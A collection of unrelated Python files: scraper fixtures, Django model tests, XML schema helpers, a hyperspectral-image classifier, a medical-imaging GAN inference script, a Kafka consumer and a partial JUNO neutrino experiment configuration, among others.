def default_scraper(default_hub, default_data_folder) -> HabrScraper:
return HabrScraper(default_hub, [], default_data_folder)
@pytest.fixture()
def data_folder_path() -> Generator[Path, None, None]:
test_folder = BASEDIR.joinpath("test_data")
test_folder.mkdir(exist_ok=True, parents=True)
article_folder = test_folder.joinpath("111")
article_folder.mkdir(exist_ok=True, parents=True)
yield test_folder
shutil.rmtree(test_folder)
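# Illustrative sketch (not part of the original test module): a minimal test consuming the
# fixtures above. It assumes only that Hub exposes its constructor arguments as attributes;
# the wider HabrScraper/DataFolder APIs are not assumed here.
def test_default_hub_is_python(default_hub, default_scraper):
    assert default_hub.hub_name == "python"
    assert default_hub.threads_number == 1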
|
def banner(text, ch='=', length=78):
"""Return a banner line centering the given text.
"text" is the text to show in the banner. None can be given to have
no text.
"ch" (optional, default '=') is the banner line character (can
also be a short string to repeat).
"length" (optional, default 78) is the length of banner to make.
Examples:
>>> banner("Peggy Sue")
'================================= Peggy Sue =================================='
>>> banner("Peggy Sue", ch='-', length=50)
'------------------- Peggy Sue --------------------'
>>> banner("Pretty pretty pretty pretty Peggy Sue", length=40)
'Pretty pretty pretty pretty Peggy Sue'
"""
if text is None:
return ch * length
elif len(text) + 2 + len(ch)*2 > length:
# Not enough space for even one line char (plus space) around text.
return text
else:
remain = length - (len(text) + 2)
        prefix_len = remain // 2
suffix_len = remain - prefix_len
if len(ch) == 1:
prefix = ch * prefix_len
suffix = ch * suffix_len
else:
            prefix = ch * (prefix_len//len(ch)) + ch[:prefix_len%len(ch)]
            suffix = ch * (suffix_len//len(ch)) + ch[:suffix_len%len(ch)]
return prefix + ' ' + text + ' ' + suffix
|
from django.test import TestCase
from platforms.models import Platform, PlatformGroup
from tenancy.models import Tenant
class PlatformGroupTest(TestCase):
def _get_tenant(self):
tenant = Tenant.objects.create(name="Acme Corp.")
return tenant
def test_slug_is_generated_on_save(self):
platform = Platform(name="Amazon", tenant=self._get_tenant())
        self.assertEqual("", platform.slug)
platform.save()
        self.assertEqual("amazon", platform.slug)
def test_create_with_minimal_data(self):
platform = Platform(name="Amazon", tenant=self._get_tenant())
platform.save()
        self.assertEqual("Amazon", platform.name)
        self.assertEqual("amazon", platform.slug)
        self.assertEqual("Acme Corp.", platform.tenant.name)
def test_create_with_complete_data(self):
group = PlatformGroup(name="Cloud")
group.save()
platform = Platform(
name="Amazon",
tenant=self._get_tenant(),
description="Amazon AWS for Operations",
group=group,
)
platform.save()
        self.assertEqual("Amazon", platform.name)
        self.assertEqual("amazon", platform.slug)
        self.assertEqual("Acme Corp.", platform.tenant.name)
        self.assertEqual("Amazon AWS for Operations", platform.description)
        self.assertEqual(group, platform.group)
class PlatformGroupModelTest(TestCase):
def test_slug_is_generated_on_save(self):
group = PlatformGroup(name="Cloud")
        self.assertEqual("", group.slug)
group.save()
        self.assertEqual("cloud", group.slug)
def test_group_has_parent_group(self):
parent = PlatformGroup(name="parent")
parent.save()
child = PlatformGroup(name="child1", parent=parent)
child.save()
def test_complete_group(self):
group = PlatformGroup(name="Cloud", slug="cl", description="A Cloud platform")
        self.assertEqual("Cloud", group.name)
        self.assertEqual("cl", group.slug)
        self.assertEqual("A Cloud platform", group.description)
|
def main():
#Short program that does some small math with
#integers and floating point data-types.
#int numbers
i_num1 = 5
i_num2 = 8
#float point numbers
f_num1 = 4.5
f_num2 = 8.25
#quicc maths
print("Float: " + str(f_num1) + " + " + str(f_num2) + " = " + str(f_num1+f_num2))
    print("Int: " + str(i_num1) + " / " + str(i_num2) + " = " + str(i_num1 / i_num2))
    print("Int * Float: " + str(i_num1) + " * " + str(f_num2) + " = " + str(i_num1 * f_num2))
if __name__=="__main__":
main()
|
# -*- coding: utf-8 -*-
#
# Copyright (c), 2016-2019, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module contains various helper functions and classes.
"""
import re
from .exceptions import XMLSchemaValueError, XMLSchemaTypeError, XMLSchemaKeyError
from .qnames import XSD_ANNOTATION
XSD_FINAL_ATTRIBUTE_VALUES = {'restriction', 'extension', 'list', 'union'}
NAMESPACE_PATTERN = re.compile(r'{([^}]*)}')
def get_namespace(name):
try:
return NAMESPACE_PATTERN.match(name).group(1)
except (AttributeError, TypeError):
return ''
def get_qname(uri, name):
"""
Returns an expanded QName from URI and local part. If any argument has boolean value
`False` or if the name is already an expanded QName, returns the *name* argument.
:param uri: namespace URI
:param name: local or qualified name
:return: string or the name argument
"""
if not uri or not name or name[0] in ('{', '.', '/', '['):
return name
else:
return '{%s}%s' % (uri, name)
def local_name(qname):
"""
    Return the local part of an expanded QName. If *qname* is `None` or empty,
    it is returned unchanged.
:param qname: an expanded QName or a local name.
"""
try:
if qname[0] != '{':
return qname
return qname[qname.rindex('}') + 1:]
except IndexError:
return ''
except ValueError:
raise XMLSchemaValueError("wrong format for a universal name! %r" % qname)
except TypeError:
if qname is None:
return qname
raise XMLSchemaTypeError("required a string-like object or None! %r" % qname)
def qname_to_prefixed(qname, namespaces):
"""
Transforms a fully qualified name into a prefixed name using a namespace map. Returns the
*qname* argument if it's not a fully qualified name or if it has boolean value `False`.
:param qname: a fully qualified name or a local name.
:param namespaces: a map from prefixes to namespace URIs.
:return: string with a prefixed or local reference.
"""
if not qname:
return qname
namespace = get_namespace(qname)
for prefix, uri in sorted(filter(lambda x: x[1] == namespace, namespaces.items()), reverse=True):
if not uri:
return '%s:%s' % (prefix, qname) if prefix else qname
elif prefix:
return qname.replace('{%s}' % uri, '%s:' % prefix)
else:
return qname.replace('{%s}' % uri, '')
else:
return qname
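# A minimal usage sketch of the QName helpers above (illustrative values, not
# part of the original module):
#   get_qname('http://www.w3.org/2001/XMLSchema', 'string')
#       -> '{http://www.w3.org/2001/XMLSchema}string'
#   local_name('{http://www.w3.org/2001/XMLSchema}string')
#       -> 'string'
#   qname_to_prefixed('{http://www.w3.org/2001/XMLSchema}string',
#                     {'xs': 'http://www.w3.org/2001/XMLSchema'})
#       -> 'xs:string'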
def get_xsd_annotation(elem):
"""
Returns the annotation of an XSD component.
:param elem: ElementTree's node
:return: The first child element containing an XSD annotation, `None` if \
the XSD information item doesn't have an annotation.
"""
try:
return elem[0] if elem[0].tag == XSD_ANNOTATION else None
except (TypeError, IndexError):
return
def iter_xsd_components(elem, start=0):
"""
Returns an iterator for XSD child components, excluding the annotation.
:param elem: the parent Element.
:param start: the start child component to yield, the optional annotation is not counted. \
With the default value 0 starts from the first component.
"""
counter = 0
for child in elem:
if child.tag == XSD_ANNOTATION:
if counter > 0:
raise XMLSchemaValueError("XSD annotation not allowed after the first position.")
else:
if start > 0:
start -= 1
else:
yield child
counter += 1
def has_xsd_components(elem, start=0):
try:
next(iter_xsd_components(elem, start))
except StopIteration:
return False
else:
return True
def get_xsd_component(elem, required=True, strict=True):
"""
Returns the first XSD component child, excluding the annotation.
:param elem: the parent Element.
:param required: if `True`, that is the default, raises a *ValueError* if there \
is not any component; with `False` in those cases `None` is returned.
:param strict: raises a *ValueError* if there is more than one component.
"""
components_iterator = iter_xsd_components(elem)
try:
xsd_component = next(components_iterator)
except StopIteration:
if required:
raise XMLSchemaValueError("missing XSD component")
return None
else:
if not strict:
return xsd_component
try:
next(components_iterator)
except StopIteration:
return xsd_component
else:
raise XMLSchemaValueError("too many XSD components")
def get_xml_bool_attribute(elem, attribute, default=None):
"""
Get an XML boolean attribute.
:param elem: the Element instance.
:param attribute: the attribute name.
:param default: default value, accepted values are `True` or `False`.
:return: `True` or `False`.
"""
value = elem.get(attribute, default)
if value is None:
raise XMLSchemaKeyError(attribute)
elif value in ('true', '1') or value is True:
return True
elif value in ('false', '0') or value is False:
return False
else:
raise XMLSchemaTypeError("an XML boolean value is required for attribute %r" % attribute)
def get_xsd_derivation_attribute(elem, attribute, values=None):
"""
Get a derivation attribute (maybe 'block', 'blockDefault', 'final' or 'finalDefault')
checking the items with the values arguments. Returns a string.
:param elem: the Element instance.
:param attribute: the attribute name.
:param values: sequence of admitted values when the attribute value is not '#all'.
:return: a string.
"""
value = elem.get(attribute)
if value is None:
return ''
if values is None:
values = XSD_FINAL_ATTRIBUTE_VALUES
items = value.split()
if len(items) == 1 and items[0] == '#all':
return ' '.join(values)
elif not all([s in values for s in items]):
raise XMLSchemaValueError("wrong value %r for attribute %r." % (value, attribute))
return value
def get_xsd_form_attribute(elem, attribute):
"""
Get an XSD form attribute, checking the value. If the attribute is missing returns `None`
:param elem: the Element instance.
:param attribute: the attribute name (maybe 'form', or 'elementFormDefault' or 'attributeFormDefault').
:return: a string.
"""
value = elem.get(attribute)
if value is None:
return
elif value not in ('qualified', 'unqualified'):
raise XMLSchemaValueError(
"wrong value %r for attribute %r, it must be 'qualified' or 'unqualified'." % (value, attribute)
)
return value
class ParticleCounter(object):
"""
A helper class for counting total min/max occurrences of XSD particles.
"""
def __init__(self):
self.min_occurs = self.max_occurs = 0
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.min_occurs, self.max_occurs)
def __add__(self, other):
self.min_occurs += other.min_occurs
if self.max_occurs is not None:
if other.max_occurs is None:
self.max_occurs = None
else:
self.max_occurs += other.max_occurs
return self
def __mul__(self, other):
self.min_occurs *= other.min_occurs
if self.max_occurs is None:
if other.max_occurs == 0:
self.max_occurs = 0
elif other.max_occurs is None:
if self.max_occurs != 0:
self.max_occurs = None
else:
self.max_occurs *= other.max_occurs
return self
def reset(self):
self.min_occurs = self.max_occurs = 0
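# A minimal usage sketch (assumed particle objects, not part of the original
# module): '+' accumulates occurrences of sibling particles, '*' scales them by
# the enclosing group, and a max_occurs of None stands for 'unbounded'.
#   counter = ParticleCounter()
#   for particle_counter in sibling_counters:   # hypothetical iterable
#       counter += particle_counter
#   counter *= group_counter                    # apply the group's own min/max occurs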
|
#!/usr/bin/env python
from distutils.core import setup
setup(
name='FunctionalPy',
version='1.0.0',
description='Functional programming library for Python',
author='Aruneko',
author_email='aruneko99@gmail.com',
url='https://www.github.com/aruneko/functionalpy',
packages=['functionalpy']
)
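# Typical usage for a distutils-based setup script like this one (a generic
# note, not from the original file): 'python setup.py sdist' builds a source
# distribution and 'python setup.py install' installs the package.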
|
import unittest
from click.testing import CliRunner
import ytmusic_deleter.cli as cli
class TestCli(unittest.TestCase):
def test_delete_uploads(self):
runner = CliRunner()
result = runner.invoke(cli.delete_uploads, ["--add-to-library"])
assert result.exit_code == 0
def test_remove_albums_from_library(self):
runner = CliRunner()
result = runner.invoke(cli.remove_library)
assert result.exit_code == 0
def test_unlike_all_songs(self):
runner = CliRunner()
result = runner.invoke(cli.unlike_all)
assert result.exit_code == 0
def test_delete_playlists(self):
runner = CliRunner()
result = runner.invoke(cli.delete_playlists)
assert result.exit_code == 0
|
import spectral as sp
import numpy as np
import math
import traceback
from PIL import Image
#attention: need to change res's name and
#calculate the average spectrum of an img. Input an img and return an array (the same format as the Spectral lib's)
def cal_aver_SP(img):
width, height, deepth = img.shape
sum_SP = 0
count = 0
for i in range(width):
for j in range(height):
pixel_SP = img[i,j]
if exclude_BG(pixel_SP):
continue
else:
sum_SP += pixel_SP
count += 1
return sum_SP / count
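# A vectorized sketch of the same averaging (an assumed alternative, not used by
# the rest of this script). It expects a plain NumPy array; for a Spectral image
# object the cube would typically have to be loaded into memory first.
def cal_aver_SP_np(img_array):
    arr = np.asarray(img_array)
    pixels = arr.reshape(-1, arr.shape[-1])   # (n_pixels, n_bands)
    keep = pixels.sum(axis=1) != 0            # same background test as exclude_BG
    return pixels[keep].mean(axis=0)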
#check whether a pixel (a spectrum array) is background. Return True for background, False otherwise
def exclude_BG(pixel_array):
if sum(pixel_array) == 0:
return True
else:
return False
# input training data, maybe this would be a wizard (choose files later)
def input_training_data():
pass
def input_testing_data():
pass
# spectral angle mapping: input the reference spectrum, the testing spectrum and the number of spectral bands (deepth). Returns the angle between the ref and test spectra.
def cal_SP_angle(SP_reference, SP_testing, deepth):
DownSide1 = 0
DownSide2 = 0
UpSide = 0
for d in range(deepth):
bandValue_testing = SP_testing[d]
bandValue_reference = SP_reference[d]
UpSide += bandValue_reference* bandValue_testing
DownSide1 += bandValue_reference**2
DownSide2 += bandValue_testing**2
angle = UpSide/ (DownSide1**0.5 * DownSide2**0.5)
try:
angle = math.acos(angle)
except Exception as err:
        print('the abs(angle) > 1.\nError info: ' + str(err.args), end='\n')
exit(0)
return angle
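# A vectorized sketch of the same spectral-angle computation (an assumed
# alternative, not used by the rest of this script); clipping guards against
# floating-point round-off pushing the cosine slightly outside [-1, 1].
def cal_SP_angle_np(SP_reference, SP_testing):
    ref = np.asarray(SP_reference, dtype=np.float64)
    test = np.asarray(SP_testing, dtype=np.float64)
    cos_angle = np.dot(ref, test) / (np.linalg.norm(ref) * np.linalg.norm(test))
    return math.acos(np.clip(cos_angle, -1.0, 1.0))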
#traverse the whole testing img, calculate and classify each pixel. Return [res, accuracy]: the first records the classification info, the latter stores the accuracy
# input: two ref imgs, the testing img and the testing type (default 1 tests Oxido, 2 tests Sul)
def Tranversing(img_reference1, img_reference2, img_testing, testingType = 1):
aver_reference1 = cal_aver_SP(img_reference1)
aver_reference2 = cal_aver_SP(img_reference2)
width, height, deepth = img_testing.shape
#res is a list that would save the classification result, 2 is background, 1 is right, 0 is wrong.
res = []
# the pixel number of background
count_bg = 0
count_right = 0
for i in range(width):
for j in range(height):
SP_testing = img_testing[i,j]
# if this pixel is background, res = 2
if exclude_BG(SP_testing):
res.append(2)
count_bg += 1
continue
SP_reference1 = aver_reference1
SP_reference2 = aver_reference2
angle_ref1 = cal_SP_angle(SP_reference1, SP_testing, deepth)
angle_ref2 = cal_SP_angle(SP_reference2,SP_testing, deepth)
            # attention please: this is the red mark code, maybe you could add more barriers here.
# attention please: now ref1 is oxido, ref2 is sulfuro, testing img is a oxido
if testingType == 1:
if angle_ref1 < angle_ref2:
res.append(1)
count_right += 1
else:
res.append(0)
elif testingType == 2:
if angle_ref1 > angle_ref2:
res.append(1)
count_right += 1
else:
res.append(0)
accurarcy = count_right / (width * height - count_bg)
return [res,accurarcy]
def show_res(res_list,accurarcy, width, height,filePath,resName):
newImg = Image.new('L',(width,height))
for i in range(width):
for j in range(height):
if res_list[i*height+j] == 0:
newImg.putpixel((i,j),123)
elif res_list[i*height + j] == 1:
newImg.putpixel((i,j), 255)
elif res_list[i*height + j] == 2:
newImg.putpixel((i,j), 0)
    print('\n your accuracy is : %f \n' % accurarcy)
newImg.save(filePath + resName, 'bmp')
newImg.show()
# output the res. Two methods: accuracy and image, a white pixel is a right one and a black pixel is a wrong one.
if __name__ == '__main__':
#open the file
    input_training_data()
filePath = 'data/'
fileName_sul = "sulfuros_sub/EscSulf01_Backside_SWIR_Subset_Masked.hdr"
fileName_oxi = "oxidos/EscOx01B1_rough_SWIR.hdr"
fileName_testing = "oxidos/EscOx37B1_rough_SWIR.hdr"
    #two training imgs. Using the average spectrum of all their pixels
try:
img_sulfuro = sp.open_image(filePath+fileName_sul)
img_oxido = sp.open_image(filePath+fileName_oxi)
except Exception as err:
print('Cannot open your training file.\nError info:' + str(err.args), end = '\n')
exit(0)
#input testing data
input_testing_data()
try :
img_testing = sp.open_image(filePath + fileName_testing)
except Exception as err:
print('Cannot open your testing file.\n Error info:' + str(err.args), end = '\n')
exit(0)
    # traverse the img and calculate the spectral angle between testImg and refImg.
    # Input: testing img and reference imgs.
if 'Sulf' in fileName_testing:
res, accurarcy = Tranversing(img_oxido,img_sulfuro, img_testing, 2)
else:
res, accurarcy = Tranversing(img_oxido,img_sulfuro, img_testing, 1)
width, height, deepth = img_testing.shape
resName = fileName_testing.split('/')[1].split('_')[0] + '_res.bmp'
show_res(res,accurarcy, width, height, filePath, resName)
|
# ---------------------------------------------------------
# Tensorflow MPC-GAN Implementation
# Licensed under The MIT License [see LICENSE for details]
# Written by Hulin Kuang
# ---------------------------------------------------------
import os
import tensorflow as tf
from solver import Solver
import numpy as np
import nibabel as nib
import scipy.io as sio
import gc
FLAGS = tf.flags.FLAGS
import time
tf.flags.DEFINE_integer('train_interval', 1, 'training interval between discriminator and generator, default: 1')
tf.flags.DEFINE_integer('ratio_gan2seg', 10, 'ratio of gan loss to seg loss, default: 10')
tf.flags.DEFINE_string('gpu_index', '0', 'gpu index, default: 0')
tf.flags.DEFINE_integer('batch_size', 1, 'batch size, default: 1')
tf.flags.DEFINE_bool('is_test', True, 'run in test mode, default: True (set False to train)')  # False True
tf.flags.DEFINE_string('dataset', 'Hemorrhage', 'dataset name [Hemorrhage|Infarct], default: Hemorrhage')
tf.flags.DEFINE_float('learning_rate', 2e-4, 'initial learning rate for Adam, default: 2e-4')
tf.flags.DEFINE_float('beta1', 0.5, 'momentum term of adam, default: 0.5')
tf.flags.DEFINE_integer('iters', 20000, 'number of iterations, default: 20000')
tf.flags.DEFINE_integer('print_freq', 100, 'print frequency, default: 100')
tf.flags.DEFINE_integer('eval_freq', 500, 'evaluation frequency, default: 500')
tf.flags.DEFINE_integer('sample_freq', 200, 'sample frequency, default: 200')
tf.flags.DEFINE_string('checkpoint_dir', './checkpoints', 'models are saved here')
tf.flags.DEFINE_string('sample_dir', './sample', 'sample are saved here')
tf.flags.DEFINE_string('test_dir', './test', 'test images are saved here')
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu_index
im_root = '../testdata/'
lst = os.listdir(im_root)
idname = lst #lst[1:]
N = len(idname)
nx = 512
ny = 512
for ind in range (0,N):#(10,N):
# load GT
niiname = im_root + idname[ind] + '/lesionGT.nii.gz'
if os.path.exists(niiname) is False:
continue
gt_sub = nib.load(niiname)
gt_data = gt_sub.get_data()
nx0 = gt_data.shape[0]
ny0 = gt_data.shape[1]
    if nx0 != nx or ny0 != ny:
continue
gt_data = gt_sub.get_data()
gt = np.float32(gt_data)
# load cropped norm 0-1 img
niiname = im_root + idname[ind] + '/ncct_brainRZNorm.nii.gz'
img_sub = nib.load(niiname)
img = img_sub.get_data()
# load difference med7
niiname = im_root + idname[ind] + '/DifMed7.nii.gz'
img_sub = nib.load(niiname)
dif7 = img_sub.get_data()
hdrimg = img_sub.header
img_affine = img_sub.affine
# load mask
niiname = im_root + idname[ind] + '/brain_mask.nii.gz'
img_sub = nib.load(niiname)
mask = img_sub.get_data()
mask_size_z = np.sum(np.sum(mask, axis=0), axis=0)
ind0 = np.where(mask_size_z < 1000)
# load distance
niiname = im_root + idname[ind] + '/dist.nii.gz'
img_sub = nib.load(niiname)
dist = img_sub.get_data()
# load location prob
niiname = im_root + idname[ind] + '/locprob.nii.gz'
img_sub = nib.load(niiname)
loc = img_sub.get_data()
img = np.transpose(img, [2, 0, 1])
dif7 = np.transpose(dif7, [2, 0, 1])
mask = np.transpose(mask, [2, 0, 1])
gt = np.transpose(gt, [2, 0, 1])
dist = np.transpose(dist, [2, 0, 1])
loc = np.transpose(loc, [2, 0, 1])
img = np.multiply(img, mask)
dif7 = np.multiply(dif7, mask)
gt = np.multiply(gt, mask)
loc = np.multiply(loc, mask)
dist = np.multiply(dist, mask)
gt[gt <= 0] = 0
gt[gt > 0] = 1
nz_all = img.shape[0]
ny_all = img.shape[1]
nx_all = img.shape[2]
X_data = np.zeros((nz_all, ny_all, nx_all, 4), dtype=np.float32)
X_data[:, :, :, 0] = img
X_data[:, :, :, 1] = dif7
X_data[:, :, :, 2] = dist
X_data[:, :, :, 3] = loc
solver = Solver(FLAGS)
prob = solver.test(X_data,gt,mask,ind)
    # zero out slices whose brain mask has fewer than 1000 voxels (ind0 above) so they are not detected
mask[ind0[0], :, :] = 0
prob = np.multiply(prob, mask)
prob = np.transpose(prob, [1, 2, 0])
prob = (prob - np.amin(prob))/(np.amax(prob) - np.amin(prob))
probpath = './MPCGAN_Res_' + FLAGS.dataset + '/' + idname[ind]
flag = os.path.exists(probpath)
if flag == 0:
os.makedirs(probpath)
savename = probpath + '/' + idname[ind] + '_probmap_MPCGAN.nii.gz'
affine = img_affine # np.diag([1, 2, 3, 1])
array_img = nib.Nifti1Image(prob, affine)
nib.save(array_img, savename)
print(idname[ind])
print('complete !!')
del prob, savename, array_img, gt_sub, gt, mask,X_data
gc.collect()
|
import os
import sys
from threading import Thread, currentThread
import json
from kafka import KafkaConsumer
import django
def consumer(canonical_source):
from Sync.models import CanonicalUpdate, ENUM_UpdateStatus
consumer = KafkaConsumer(canonical_source.name,
bootstrap_servers=['localhost:9092'])
print( f"Subscribed to { canonical_source.name }" )
done = False
current_thread = currentThread()
while not getattr(current_thread, "done", False):
message = next(consumer)
print ("%s:%d:%d: key=%s value=%s" % ( message.topic, message.partition,
message.offset, message.key,
message.value.decode('utf-8')))
update = CanonicalUpdate(canonical_source=canonical_source, status=ENUM_UpdateStatus.IN_PROGRESS, json=json.loads(message.value))
update.save()
def setup():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'kitchen_sync.settings')
django.setup()
def main():
from Sync.models import CanonicalSource
sources = CanonicalSource.objects.all()
threads = []
done = False
for source in sources:
thread = Thread(target=consumer, args=(source,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
setup()
main()
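# Shutdown sketch (an assumption, not part of the original script): each worker
# re-checks its 'done' attribute between messages, so a coordinator (e.g. a
# signal handler) could stop the consumers with:
#   for thread in threads:
#       thread.done = True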
|
"""
Author: Pavel Moiseenko (Моисеенко Павел), subgroup No. 2.
ISR 4.2. Task: develop a program fragment using the pyqrcode library
that creates a QR code image from a text string passed to the program.
"""
import pyqrcode
image = pyqrcode.create(input("Enter text: "))
image.svg("qr.svg")
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
def normalize(value):
"""Returns the string with decimal separators normalized."""
return value.replace(',', '.')
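# Example (assumed input): normalize('13:30:05,5') -> '13:30:05.5'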
|
from __future__ import absolute_import
from sentry.plugins import Plugin2
class GemstoneYetAnotherPlugin(Plugin2):
pass
|
from gna.exp import baseexp
from gna.configurator import uncertaindict, uncertain, NestedDict
from gna import constructors as C
from gna.expression.index import NIndex
import numpy as np
from load import ROOT as R
seconds_per_day = 60*60*24
class exp(baseexp):
"""
JUNO experiment implementation v01 (frozen)
Derived [2019.12] from:
- Daya Bay model from dybOscar and GNA
- juno_chengyp
Changes since previous implementation [juno_chengyp]:
- Dropped Enu-mode support
- Add matter oscillations
Implements:
- Reactor antineutrino flux:
* Spectra:
+ ILL+Vogel (now default)
+ Huber+Mueller
* [optional] Off-equilibrium corrections (Mueller)
* NO SNF contribution
- Vacuum 3nu oscillations
    - Evis mode with 2d integration (similarly to dybOscar)
- Final binning:
* 20 keV
* 10 keV (default)
    - [optional] Birks-Cherenkov detector energy response (Yaping)
- [optional] Detector energy resolution
- [optional] Multi-detector energy resolution (Yaping)
        * subdetectors summed together
* subdetectors concatenated
Misc changes:
- Switch oscillation probability bundle from v03 to v04 (OscProb3 class)
- Switch to double angle parameters for theta12 and theta13
- Added concatenated subdetectors
- Uncomment uncertainties:
* energy per fission
* fission fractions
"""
detectorname = 'AD1'
@classmethod
def initparser(cls, parser, namespace):
parser.add_argument( '--dot', help='write graphviz output' )
parser.add_argument( '-s', '--show', action='store_true', help='show the figure' )
parser.add_argument( '-o', '--output', help='output figure name' )
parser.add_argument('-p', '--print', action='append', choices=['outputs', 'inputs'], default=[], help='things to print')
parser.add_argument('-v', '--verbose', action='count', default=0, help='verbosity level')
parser.add_argument('--stats', action='store_true', help='print stats')
# Energy model
parser.add_argument('--energy-model', nargs='*', choices=['lsnl', 'eres', 'multieres'], default=['lsnl', 'eres'], help='Energy model components')
parser.add_argument('--subdetectors-number', type=int, choices=(200, 5), help='Number of subdetectors (multieres mode)')
parser.add_argument('--multieres', default='sum', choices=['sum', 'concat'], help='How to treat subdetectors (multieres mode)')
parser.add_argument('--eres-b-relsigma', type=float, help='Energy resolution parameter (b) relative uncertainty')
eres = parser.add_mutually_exclusive_group()
eres.add_argument('--eres-sigma', type=float, help='Energy resolution at 1 MeV')
eres.add_argument('--eres-npe', type=float, default=1350.0, help='Average Npe at 1 MeV')
# binning
parser.add_argument('--estep', default=0.01, choices=[0.02, 0.01], type=float, help='Binning step')
# reactor flux
parser.add_argument('--reactors', choices=['single', 'near-equal', 'far-off', 'pessimistic', 'nohz', 'dayabay'], default=[], nargs='+', help='reactors options')
parser.add_argument('--flux', choices=['huber-mueller', 'ill-vogel'], default='ill-vogel', help='Antineutrino flux')
parser.add_argument('--offequilibrium-corr', action='store_true', help="Turn on offequilibrium correction to antineutrino spectra")
# osc prob
parser.add_argument('--oscprob', choices=['vacuum', 'matter'], default='vacuum', help='oscillation probability type')
# Parameters
parser.add_argument('--parameters', choices=['default', 'yb', 'yb_t13', 'yb_t13_t12', 'yb_t13_t12_dm12', 'global'], default='default', help='set of parameters to load')
parser.add_argument('--dm', default='ee', choices=('23', 'ee'), help='Δm² parameter to use')
parser.add_argument('--pdgyear', choices=[2016, 2018], default=2018, type=int, help='PDG version to read the oscillation parameters')
parser.add_argument('--spectrum-unc', choices=['initial', 'final', 'none'], default='none', help='type of the spectral uncertainty')
correlations = [ 'lsnl', 'subdetectors' ]
        parser.add_argument('--correlation', nargs='*', default=correlations, choices=correlations, help='Enable correlations')
def init(self):
self.init_nidx()
self.init_formula()
self.init_configuration()
self.preinit_variables()
self.build()
self.parameters()
self.register()
self.autodump()
if self.opts.stats:
self.print_stats()
def init_nidx(self):
if self.opts.subdetectors_number:
self.subdetectors_names = ['subdet%03i'%i for i in range(self.opts.subdetectors_number)]
else:
self.subdetectors_names = ()
self.reactors = ['YJ1', 'YJ2', 'YJ3', 'YJ4', 'YJ5', 'YJ6', 'TS1', 'TS2', 'TS3', 'TS4', 'DYB', 'HZ']
if 'pessimistic' in self.opts.reactors:
self.reactors.remove('TS3')
self.reactors.remove('TS4')
if 'far-off' in self.opts.reactors:
self.reactors.remove('DYB')
self.reactors.remove('HZ')
if 'nohz' in self.opts.reactors:
self.reactors.remove('HZ')
if 'dayabay' in self.opts.reactors:
self.reactors=['DYB']
if 'single' in self.opts.reactors:
self.reactors=['YJ1']
self.nidx = [
('d', 'detector', [self.detectorname]),
['r', 'reactor', self.reactors],
['i', 'isotope', ['U235', 'U238', 'Pu239', 'Pu241']],
('c', 'component', ['comp0', 'comp12', 'comp13', 'comp23']),
('s', 'subdetector', self.subdetectors_names)
]
self.nidx = NIndex.fromlist(self.nidx)
def init_formula(self):
if 'eres' in self.opts.energy_model and 'multieres' in self.opts.energy_model:
raise Exception('Energy model options "eres" and "multieres" are mutually exclusive: use only one of them')
self.formula = list(self.formula_base)
oscprob_part = self.opts.oscprob=='vacuum' and self.formula_oscprob_vacuum or self.formula_oscprob_matter
offeq_correction = '*offeq_correction[i,r](enu())' if self.opts.offequilibrium_corr else ''
ibd = self.formula_ibd_noeffects.format(oscprob=oscprob_part, offeq_correction=offeq_correction)
self.formula = self.formula + self.formula_enu
energy_model_formula = ''
energy_model = self.opts.energy_model
concat_subdetectors=False
if 'lsnl' in energy_model:
energy_model_formula = 'lsnl| '
self.formula.append('evis_edges_hist| evis_hist')
if 'eres' in energy_model:
energy_model_formula = 'eres| '+energy_model_formula
self.formula.append('eres_matrix| evis_hist')
elif 'multieres' in energy_model:
if self.opts.multieres=='sum':
energy_model_formula = 'sum[s]| subdetector_fraction[s] * eres[s]| '+energy_model_formula
self.formula.append('eres_matrix[s]| evis_hist')
elif self.opts.multieres=='concat':
energy_model_formula = 'concat[s]| rebin| subdetector_fraction[s] * eres[s]| '+energy_model_formula
self.formula.append('eres_matrix[s]| evis_hist')
concat_subdetectors = True
if concat_subdetectors:
formula_back = 'observation=norm * ibd'
else:
formula_back = 'observation=norm * rebin(ibd)'
if self.opts.spectrum_unc=='initial':
ibd = ibd+'*shape_norm()'
elif self.opts.spectrum_unc=='final':
formula_back = formula_back+'*shape_norm()'
self.formula.append('ibd=' + energy_model_formula + ibd)
self.formula.append(formula_back)
def parameters(self):
ns = self.namespace
dmxx = 'pmns.DeltaMSq'+str(self.opts.dm).upper()
for par in [dmxx, 'pmns.SinSqDouble12', 'pmns.DeltaMSq12']:
ns[par].setFree()
def single2double(v):
return 4.0*v*(1.0-v)
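        # e.g. single2double(0.307) = 4*0.307*(1 - 0.307) ≈ 0.851,
        # i.e. sin^2(theta) -> sin^2(2*theta) for the double-angle parameters.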
if self.opts.parameters=='yb':
ns['pmns.SinSqDouble12'].setCentral(single2double(0.307))
ns['pmns.SinSqDouble13'].setCentral(single2double(0.024))
ns['pmns.DeltaMSq12'].setCentral(7.54e-5)
ns['pmns.DeltaMSqEE'].setCentral(2.43e-3)
ns['pmns.SinSqDouble12'].reset()
ns['pmns.SinSqDouble13'].reset()
ns['pmns.DeltaMSq12'].reset()
ns['pmns.DeltaMSqEE'].reset()
elif self.opts.parameters=='yb_t13':
ns['pmns.SinSqDouble12'].setCentral(single2double(0.307))
ns['pmns.DeltaMSq12'].setCentral(7.54e-5)
ns['pmns.DeltaMSqEE'].setCentral(2.43e-3)
ns['pmns.SinSqDouble12'].reset()
ns['pmns.DeltaMSq12'].reset()
ns['pmns.DeltaMSqEE'].reset()
elif self.opts.parameters=='yb_t13_t12_dm12':
ns['pmns.DeltaMSqEE'].setCentral(2.43e-3)
ns['pmns.DeltaMSqEE'].reset()
elif self.opts.parameters=='global':
ns['pmns.DeltaMSq12'].setCentral(7.39e-5)
ns['pmns.DeltaMSq12'].reset()
def init_configuration(self):
if self.opts.eres_npe:
self.opts.eres_sigma = self.opts.eres_npe**-0.5
else:
self.opts.eres_npe = self.opts.eres_sigma**-2
